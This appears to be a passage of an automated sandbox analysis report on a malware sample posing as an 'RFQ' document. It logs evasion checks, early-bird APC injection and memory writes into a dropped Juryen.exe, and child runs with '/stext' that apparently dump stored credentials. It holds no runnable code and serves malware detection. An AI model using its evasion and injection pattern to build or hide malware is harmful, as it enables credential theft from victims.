              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeAPI/Special instruction interceptor: Address: 24B650B
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6046Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3527Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeWindow / User API: threadDelayed 3562Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeWindow / User API: threadDelayed 5949Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeAPI coverage: 4.3 %
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeAPI coverage: 9.9 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7980Thread sleep count: 194 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7980Thread sleep time: -97000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984Thread sleep count: 3562 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984Thread sleep time: -10686000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984Thread sleep count: 5949 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe TID: 7984Thread sleep time: -17847000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C4D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_0040689E FindFirstFileW,FindClose,11_2_0040689E
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F7510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_1F7510F1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F756580 FindFirstFileExA,11_2_1F756580
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: ModuleAnalysisCache.6.drBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.1762545128.0000000005225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
              Source: ModuleAnalysisCache.6.drBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.1762545128.0000000005225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
              Source: powershell.exe, 00000006.00000002.1762545128.0000000005225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: ModuleAnalysisCache.6.drBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\RFQ 008191.exeAPI call chain: ExitProcess graph end nodegraph_0-3714
              Source: C:\Users\user\Desktop\RFQ 008191.exeAPI call chain: ExitProcess graph end nodegraph_0-3722
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeAPI call chain: ExitProcess graph end nodegraph_14-34109
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1F752639
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F754AB4 mov eax, dword ptr fs:[00000030h]11_2_1F754AB4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F75724E GetProcessHeap,11_2_1F75724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1F752B1C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1F752639
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F7560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1F7560E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Juryen.exeJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Juryen.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Juryen.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Juryen.exe protection: execute and read and writeJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Juryen.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Juryen.exe base: 16D0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe "C:\Users\user~1\AppData\Local\Temp\Juryen.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"Jump to behavior
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\d
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\f1
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS"
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\*
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerI"
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\k
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager04\m
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752933 cpuid 11_2_1F752933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
